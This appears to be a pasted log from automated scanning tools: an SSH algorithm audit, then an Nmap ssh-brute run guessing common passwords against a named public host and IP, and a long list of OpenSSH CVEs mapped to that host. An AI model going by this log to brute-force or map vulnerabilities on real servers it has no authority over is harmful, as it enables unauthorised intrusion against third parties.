(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
 `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53

# host-key algorithms
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
 `- [warn] using small 1024-bit modulus
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
 `- [info] default cipher since OpenSSH 6.9.

# message authentication code algorithms
(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 6.7)
(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
(rec) -ssh-dss -- key algorithm to remove
(rec) -hmac-sha2-512 -- mac algorithm to remove
(rec) -umac-128@openssh.com -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) -umac-64@openssh.com -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:50 EDT
NSE: [ssh-run] Failed to specify credentials and command to run.
17681NSE: [ssh-brute] Trying username/password pair: test:justin
17682NSE: [ssh-brute] Trying username/password pair: root:liverpool
17683NSE: [ssh-brute] Trying username/password pair: admin:liverpool
17684NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
17685NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
17686NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
17687NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
17688NSE: [ssh-brute] Trying username/password pair: guest:liverpool
17689NSE: [ssh-brute] Trying username/password pair: user:liverpool
17690NSE: [ssh-brute] Trying username/password pair: web:liverpool
17691NSE: [ssh-brute] Trying username/password pair: test:liverpool
17692NSE: [ssh-brute] Trying username/password pair: root:football
17693NSE: [ssh-brute] Trying username/password pair: admin:football
17694NSE: [ssh-brute] Trying username/password pair: administrator:football
17695NSE: [ssh-brute] Trying username/password pair: webadmin:football
17696NSE: [ssh-brute] Trying username/password pair: sysadmin:football
17697NSE: [ssh-brute] Trying username/password pair: netadmin:football
17698NSE: [ssh-brute] Trying username/password pair: guest:football
17699NSE: [ssh-brute] Trying username/password pair: user:football
17700NSE: [ssh-brute] Trying username/password pair: web:football
17701NSE: [ssh-brute] Trying username/password pair: test:football
17702NSE: [ssh-brute] Trying username/password pair: root:loveme
17703NSE: [ssh-brute] Trying username/password pair: admin:loveme
17704NSE: [ssh-brute] Trying username/password pair: administrator:loveme
17705NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
17706NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
17707NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
17708NSE: [ssh-brute] Trying username/password pair: guest:loveme
17709NSE: [ssh-brute] Trying username/password pair: user:loveme
17710NSE: [ssh-brute] Trying username/password pair: web:loveme
17711NSE: [ssh-brute] Trying username/password pair: test:loveme
17712NSE: [ssh-brute] Trying username/password pair: root:secret
17713NSE: [ssh-brute] Trying username/password pair: admin:secret
17714NSE: [ssh-brute] Trying username/password pair: administrator:secret
17715NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
17716NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
17717NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
17718Nmap scan report for latina.petite.guru (185.82.200.52)
17719Host is up (0.12s latency).
17720
17721PORT STATE SERVICE VERSION
1772222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
17723| ssh-auth-methods:
17724| Supported authentication methods:
17725| publickey
17726|_ password
17727| ssh-brute:
17728| Accounts: No valid accounts found
17729|_ Statistics: Performed 423 guesses in 181 seconds, average tps: 2.5
17730| ssh-hostkey:
17731| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
17732| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
17733| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
17734|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
17735| ssh-publickey-acceptance:
17736|_ Accepted Public Keys: No public keys accepted
17737|_ssh-run: Failed to specify credentials and command to run.
17738| vulscan: VulDB - https://vuldb.com:
17739| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
17740| [76326] OpenSSH 6.8 XSECURITY privilege escalation
17741| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
17742| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
17743| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
17744| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
17745|
17746| MITRE CVE - https://cve.mitre.org:
17747| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
17748| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
17749| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
17750| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
17751| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
17752| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
17753|
17754| SecurityFocus - https://www.securityfocus.com/bid/:
17755| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
17756| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
17757| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
17758| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
17759| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
17760| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
17761| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
17762| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
17763| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
17764| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
17765| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
17766| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
17767| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
17768| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
17769| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
17770| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
17771| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
17772| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
17773| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
17774| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
17775| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
17776| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
17777| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
17778| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
17779| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
17780| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
17781| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
17782| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
17783| [75990] OpenSSH Login Handling Security Bypass Weakness
17784| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
17785| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
17786| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
17787| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
17788| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
17789| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
17790| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
17791| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
17792| [61286] OpenSSH Remote Denial of Service Vulnerability
17793| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
17794| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
17795| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
17796| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
17797| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
17798| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
17799| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
17800| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
17801| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
17802| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
17803| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
17804| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
17805| [30794] Red Hat OpenSSH Backdoor Vulnerability
17806| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
17807| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
17808| [28531] OpenSSH ForceCommand Command Execution Weakness
17809| [28444] OpenSSH X Connections Session Hijacking Vulnerability
17810| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
17811| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
17812| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
17813| [20956] OpenSSH Privilege Separation Key Signature Weakness
17814| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
17815| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
17816| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
17817| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
17818| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
17819| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
17820| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
17821| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
17822| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
17823| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
17824| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
17825| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
17826| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
17827| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
17828| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
17829| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
17830| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
17831| [6168] OpenSSH Visible Password Vulnerability
17832| [5374] OpenSSH Trojan Horse Vulnerability
17833| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
17834| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
17835| [4241] OpenSSH Channel Code Off-By-One Vulnerability
17836| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
17837| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
17838| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
17839| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
17840| [2917] OpenSSH PAM Session Evasion Vulnerability
17841| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
17842| [2356] OpenSSH Private Key Authentication Check Vulnerability
17843| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
17844| [1334] OpenSSH UseLogin Vulnerability
17845|
17846| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17847| [83258] GSI-OpenSSH auth-pam.c security bypass
17848| [82781] OpenSSH time limit denial of service
17849| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
17850| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
17851| [72756] Debian openssh-server commands information disclosure
17852| [68339] OpenSSH pam_thread buffer overflow
17853| [67264] OpenSSH ssh-keysign unauthorized access
17854| [65910] OpenSSH remote_glob function denial of service
17855| [65163] OpenSSH certificate information disclosure
17856| [64387] OpenSSH J-PAKE security bypass
17857| [63337] Cisco Unified Videoconferencing OpenSSH weak security
17858| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
17859| [45202] OpenSSH signal handler denial of service
17860| [44747] RHEL OpenSSH backdoor
17861| [44280] OpenSSH PermitRootLogin information disclosure
17862| [44279] OpenSSH sshd weak security
17863| [44037] OpenSSH sshd SELinux role unauthorized access
17864| [43940] OpenSSH X11 forwarding information disclosure
17865| [41549] OpenSSH ForceCommand directive security bypass
17866| [41438] OpenSSH sshd session hijacking
17867| [40897] OpenSSH known_hosts weak security
17868| [40587] OpenSSH username weak security
17869| [37371] OpenSSH username data manipulation
17870| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
17871| [37112] RHSA update for OpenSSH signal handler race condition not installed
17872| [37107] RHSA update for OpenSSH identical block denial of service not installed
17873| [36637] OpenSSH X11 cookie privilege escalation
17874| [35167] OpenSSH packet.c newkeys[mode] denial of service
17875| [34490] OpenSSH OPIE information disclosure
17876| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
17877| [32975] Apple Mac OS X OpenSSH denial of service
17878| [32387] RHSA-2006:0738 updates for openssh not installed
17879| [32359] RHSA-2006:0697 updates for openssh not installed
17880| [32230] RHSA-2006:0298 updates for openssh not installed
17881| [32132] RHSA-2006:0044 updates for openssh not installed
17882| [30120] OpenSSH privilege separation monitor authentication verification weakness
17883| [29255] OpenSSH GSSAPI user enumeration
17884| [29254] OpenSSH signal handler race condition
17885| [29158] OpenSSH identical block denial of service
17886| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
17887| [25116] OpenSSH OpenPAM denial of service
17888| [24305] OpenSSH SCP shell expansion command execution
17889| [22665] RHSA-2005:106 updates for openssh not installed
17890| [22117] OpenSSH GSSAPI allows elevated privileges
17891| [22115] OpenSSH GatewayPorts security bypass
17892| [20930] OpenSSH sshd.c LoginGraceTime denial of service
17893| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
17894| [17213] OpenSSH allows port bouncing attacks
17895| [16323] OpenSSH scp file overwrite
17896| [13797] OpenSSH PAM information leak
17897| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
17898| [13264] OpenSSH PAM code could allow an attacker to gain access
17899| [13215] OpenSSH buffer management errors could allow an attacker to execute code
17900| [13214] OpenSSH memory vulnerabilities
17901| [13191] OpenSSH large packet buffer overflow
17902| [12196] OpenSSH could allow an attacker to bypass login restrictions
17903| [11970] OpenSSH could allow an attacker to obtain valid administrative account
17904| [11902] OpenSSH PAM support enabled information leak
17905| [9803] OpenSSH "
17906| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
17907| [9307] OpenSSH is running on the system
17908| [9169] OpenSSH "
17909| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
17910| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
17911| [8383] OpenSSH off-by-one error in channel code
17912| [7647] OpenSSH UseLogin option arbitrary code execution
17913| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
17914| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
17915| [7179] OpenSSH source IP access control bypass
17916| [6757] OpenSSH "
17917| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
17918| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
17919| [5517] OpenSSH allows unauthorized access to resources
17920| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
17921|
17922| Exploit-DB - https://www.exploit-db.com:
17923| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
17924|
17925| OpenVAS (Nessus) - http://www.openvas.org:
17926| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
17927| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
17928| [881183] CentOS Update for openssh CESA-2012:0884 centos6
17929| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
17930| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
17931| [870763] RedHat Update for openssh RHSA-2012:0884-04
17932| [870129] RedHat Update for openssh RHSA-2008:0855-01
17933| [861813] Fedora Update for openssh FEDORA-2010-5429
17934| [861319] Fedora Update for openssh FEDORA-2007-395
17935| [861170] Fedora Update for openssh FEDORA-2007-394
17936| [861012] Fedora Update for openssh FEDORA-2007-715
17937| [840345] Ubuntu Update for openssh vulnerability USN-597-1
17938| [840300] Ubuntu Update for openssh update USN-612-5
17939| [840271] Ubuntu Update for openssh vulnerability USN-612-2
17940| [840268] Ubuntu Update for openssh update USN-612-7
17941| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
17942| [840214] Ubuntu Update for openssh vulnerability USN-566-1
17943| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
17944| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
17945| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
17946| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
17947| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
17948| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
17949| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
17950| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
17951| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
17952| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
17953| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
17954| [100584] OpenSSH X Connections Session Hijacking Vulnerability
17955| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
17956| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
17957| [65987] SLES10: Security update for OpenSSH
17958| [65819] SLES10: Security update for OpenSSH
17959| [65514] SLES9: Security update for OpenSSH
17960| [65513] SLES9: Security update for OpenSSH
17961| [65334] SLES9: Security update for OpenSSH
17962| [65248] SLES9: Security update for OpenSSH
17963| [65218] SLES9: Security update for OpenSSH
17964| [65169] SLES9: Security update for openssh,openssh-askpass
17965| [65126] SLES9: Security update for OpenSSH
17966| [65019] SLES9: Security update for OpenSSH
17967| [65015] SLES9: Security update for OpenSSH
17968| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
17969| [61639] Debian Security Advisory DSA 1638-1 (openssh)
17970| [61030] Debian Security Advisory DSA 1576-2 (openssh)
17971| [61029] Debian Security Advisory DSA 1576-1 (openssh)
17972| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
17973| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
17974| [60667] Slackware Advisory SSA:2008-095-01 openssh
17975| [59014] Slackware Advisory SSA:2007-255-01 openssh
17976| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
17977| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
17978| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
17979| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
17980| [57492] Slackware Advisory SSA:2006-272-02 openssh
17981| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
17982| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
17983| [57470] FreeBSD Ports: openssh
17984| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
17985| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
17986| [56294] Slackware Advisory SSA:2006-045-06 openssh
17987| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
17988| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
17989| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
17990| [53788] Debian Security Advisory DSA 025-1 (openssh)
17991| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
17992| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
17993| [11343] OpenSSH Client Unauthorized Remote Forwarding
17994| [10954] OpenSSH AFS/Kerberos ticket/token passing
17995| [10883] OpenSSH Channel Code Off by 1
17996| [10823] OpenSSH UseLogin Environment Variables
17997|
17998| SecurityTracker - https://www.securitytracker.com:
17999| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
18000| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
18001| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
18002| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
18003| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
18004| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
18005| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
18006| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
18007| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
18008| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
18009| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
18010| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
18011| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
18012| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
18013| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
18014| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
18015| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
18016| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
18017| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
18018| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
18019| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
18020| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
18021| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
18022| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
18023| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
18024| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
18025| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
18026| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
18027| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
18028| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
18029| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
18030| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
18031| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
18032| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
18033| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
18034| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
18035| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
18036| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
18037|
18038| OSVDB - http://www.osvdb.org:
18039| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
18040| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
18041| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
18042| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
18043| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
18044| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
18045| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
18046| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
18047| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
18048| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
18049| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
18050| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
18051| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
18052| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
